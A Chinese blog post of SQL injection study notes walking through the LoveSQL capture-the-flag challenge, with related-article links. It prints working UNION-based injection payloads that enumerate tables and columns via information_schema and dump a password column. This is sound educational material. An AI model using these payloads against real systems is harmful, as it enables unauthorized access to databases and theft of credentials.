sql注入笔记

最新推荐文章于 2024-05-02 11:24:16 发布
最新推荐文章于 2024-05-02 11:24:16 发布
阅读量312 收藏 13
点赞数 9
CC 4.0 BY-SA版权
文章标签: sql 笔记 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81290872/article/details/137154330
本文详细介绍了SQL注入的原理,通过实际的LoveSQL挑战,逐步展示了如何找到注入点、判断字段数和顺序,进而获取数据库表信息及flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

sql注入原理

在与服务器数据库进行数据交互的地方拼接了恶意的sql代码,达到欺骗服务器执行恶意代码的目的。本质上是程序把用户输入的数据当成了sql语句执行。

SQL注入攻击思路

1.寻找注入点,判断闭合拼接

2.判断页面回馈寻找获取数据的方式

3.根据掌握的信息进行攻击

步骤(以2019极客大挑战中的LoveSQL为例)

确定注入类型

有登录框,可以在登录框里注入

尝试使用万能密码

回显了一个奇怪的字符串,看起来很像flag,但不是

确定字段数和显示顺序

在初步尝试登录成功后,接下来还是按照sql注入的步骤进行。我们注入1' union select 1, 2, 3 #,发现Hello处显示了2,Your password is处显示了3,再经过其它测试发现查询的字段数只有3列。可以猜到第2列对应的是用户名,第3列对应的是密码。

获取数据库以及表信息

基本上确定注入类型和字段数

注入语句找库

1' union select 1, 2, group_concat(table_name) from information_schema.tables where table_schema=database() #

   

获取字段信息

根据上步骤可以猜测flag存在表l0ve1ysq1中,下面就应该获取字段信息

1' union select 1, 2, group_concat(column_name) from information_schema.columns where table_name="l0ve1ysq1" #

  

基本确定flag在字段password中

联合查询1' union select 1, 2, group_concat(password) from l0ve1ysq1 #

  

得到flag

出来了这一段:

  wo_tai_nan_le,glzjin_wants_a_girlfriend,biao_ge_dddd_hm,linux_chuang_shi_ren,a_rua_rain,yan_shi_fu_de_mao_bo_he,cl4y,di_2_kuai_fu_ji,di_3_kuai_fu_ji,di_4_kuai_fu_ji,di_5_kuai_fu_ji,di_6_kuai_fu_ji,di_7_kuai_fu_ji,di_8_kuai_fu_ji,Syc_san_da_hacker,flag{81af2596-7902-4c5f-a688-c2b271206b53}

zthsgd2b
关注
MySQl登录实例的SQL注入问题
weixin_51232559的博客
07-01 1294
SQL注入问题想必大家都会有所听闻,因为也许大家都听过某某学长通过攻击学校数据库修改自己成绩的事情,这些学长们一般用的就是SQL注入方法。SQL注入是一种非常常见的数据库攻击手段,SQL注入漏洞也是网络世界中最普遍的漏洞之一。...
预防SQL注入笔记
最新发布
2401_88755455的博客
02-10 1129
本文参考自owasp,重点是提供清晰,简单,可操作的指导,以防止应用程序中的SQL注入漏洞。发生了如此多的成功SQL注入攻击有点可耻,因为在代码中避免SQL注入漏洞非常简单。当软件开发人员创建包含用户提供的输入的动态数据库查询时,会引入SQL注入漏洞。为了避免SQL注入缺陷很简单。开发人员需要:a)停止编写动态查询;b)防止用户提供的包含恶意SQL的输入影响所执行查询的逻辑。本文提供了一组通过避免这两个问题来防止SQL注入漏洞的简单技术。这些技术几乎可以与任何类型的数据库一起使用。
sql注入学习——使用sql注入进行登录,使用union进行攻击注入
Demonslzh的博客
06-27 4578
1、sql注入环境搭建 为了方便对sql注入学习,我们首先搭建一个简单的web页面,数据库使用postgresql,具体页面如下 需要这个页面源码的可以去关注页面底部公众号后台回复获取 2、使用sql注入进行登录 数据库的用户信息如下 看下登录的一个主要逻辑,登录成功后前端页面显示当前用户所拥有的权限,登录失败则显示permission denied #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ 1) change to directory co
毕业一年,从事运维感觉没有出路,如何转型更有前景?
Python_0011的博客
07-08 1775
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
利用SQLmap实现 SQL 注入
weixin_70934757的博客
06-29 957
SQL注入是一种非常常见的数据库攻击手段,SQL注入漏洞也是网络世界中最普遍的漏洞之一。大家也许都听过某某学长通过攻击学校数据库修改自己成绩的事情,这些学长们一般用的就是SQL注入方法。SQL注入其实就是恶意用户通过在表单中填写包含SQL关键字的数据来使数据库执行非常规代码的过程。简单来说,就是数据「越俎代庖」做了代码才能干的事情。
​ 一文搞懂什么是SQL注入---SQL注入详解
VN520的博客
09-06 737
通常我们的一条sql在db接收到最终执行完毕返回可以分为下面三个过程:词法和语义解析 优化sql语句,制定执行计划 执行并返回结果 我们把这种普通语句称作Immediate Statements。但是很多情况,我们的一条sql语句可能会反复执行,或者每次执行的时候只有个别的值不同(比如query的where子句值不同,update的set子句值不同,insert的values值不同)。如果每次都需要经过上面的词法语义解析、语句优化、制定执行计划等,则效率就明显不行了。
SQL注入笔记
02-07
SQL注入笔记 对于新手学习SQL注入很有帮助 欢迎大家查看
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
【网络安全-SQL注入(3)】SQL注入----一篇文章教你access数据库SQL注入以及注入点利用
m0_67844671的博客
10-01 1751
本篇文章以凡诺企业网站管理系统为例,讲解了access数据库是如何进行SQL注入的,以及注入点如何利用,如何判断查询字段个数,如果用联合查询爆出数据库数据等;【网络安全-SQL注入SQL注入----一篇文章教你access数据库SQL注入以及注入点利用。SQL注入【3】;
利用SQL注入漏洞登录后台
03-27
通过介绍SQL Injection的基本原理,讲解如何防范SQL Injection。通过一些程序源码对SQL的攻击进行了细致分析,使我们对SQL Injection机理有了一个深入认识,作为一名Web应用开发人员,一定不要盲目相信用户的输入,而要对用户输入的数据进行严格的校验处理,否则的话,SQL Injection将会不期而至。
综合案例(账号密码登录和SQL注入
IT深耕十余载,大道之简
05-02 1958
在后台,我们使用SQL查询语句来验证用户输入的用户名和密码是否与数据库中存储的相匹配。然而,如果我们在编写上述SQL查询语句时没有对用户输入进行适当的过滤或转义,就可能会面临SQL注入的风险。攻击者可以在用户名或密码的输入框中输入一些特殊字符,从而改变SQL查询语句的语义,达到绕过登录验证或窃取数据的目的。当用户输入用户名和密码后,后台会执行一条SQL查询语句来验证输入的用户名和密码是否与数据库中存储的相匹配。始终为真,所以这个查询语句会返回数据库中所有的用户数据,从而绕过了登录验证。
03-SQL注入-登录漏洞
tianxiadiiw的博客
03-17 999
addslashes函数可以将字符串中的单引号,双引号,反斜杠,NULL值自动添加转义符,从而防止SQL注入中对单引号和双引号的预防。预处理的过程,就是先交给MySQL数据库进行SQL语句的准备,准备好后再将SQL语句中的参数进行值的替换,MySQL的预处理即支持面向过程,也支持面向对象的方式,但是我们后续直接使用面向对象的方式。引号会进行转义处理,将所有的参数变成普通字符串,再进行第二次正式的SQL语句执行。在SQL注入后打乱了SQL的语句拼接,重新闭合成了一个新的SQL语句。
利用SQL注入漏洞登录后台的实现方法
米克源码的博客
01-22 2208
注意到了没有,我们直接将用户提交过来的数据(用户名和密码)直接拿去执行,并没有实现进行特殊字符过滤,待会你们将明白,这是致命的。用户名:
DC-1 登录框的sql注入
a_153161的博客
12-04 1321
DC-1登录框的报错注入
sql登录注入
陈羽
09-06 2234
早在02年,国外关于SQL注入漏洞的技术文章已经很多,而国内在05年左右才开始的。   如今,谈SQL注入漏洞是否已是明日黄花,国内大大小小的网站都已经补上漏洞。但,百密必有一疏,入侵是偶然的,但安全绝对不是必然的。   前些天,网上传得沸沸扬扬的“拖库”事件给我们敲响了安全警钟。   在开发网站的时候,出于安全考虑,需要过滤从页面传递过来的字符。通常,用户可以通过以下接口调用数据库
mysql 登录框注入_sqlmap之(六)----POST登陆框注入实战
weixin_30698775的博客
01-19 755
利用sqlmap进行POST注入,常见的有三种方法:注入方式一:1.用Burp抓包,然后保存抓取到的内容。例如:保存为post.txt,然后把它放至某个目录下2.列数据库:sqlmap.py-r"c:\Users\fendo\Desktop\post.txt"-pn--dbs注:-r表示加载一个文件,-p指定参数其中出现了三次提示:it looks like the back-end D...
用户登录页面--SQL注入
热门推荐
李书明(石家庄)的专栏
01-23 1万+
web网站攻击方式多种多样,sql注入是经常使用的攻击方向。攻击者把SQL命令插入到Web表单的输入域或页面请求的字符串,欺骗服务器执行恶意的SQL命令 SQL注入不是Web或数据库服务器中的缺陷,而是由于编程实践较差且缺乏经验而导致的。 动态拼接的SQL指令最易受攻击。 如登录时使用的SQL指令: $query = 'SELECT * from Users WHERE login = ' ...
SQL注入漏洞检测与案例分析
本篇SQL注入笔记主要介绍了如何识别和利用SQL注入漏洞在不同数据库系统中的表现。首先,作者提到,当通过URL参数传递的`category`字段在包含特殊字符时,如`'`或`"`,如果页面显示结果没有变化,可能暗示存在注入...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值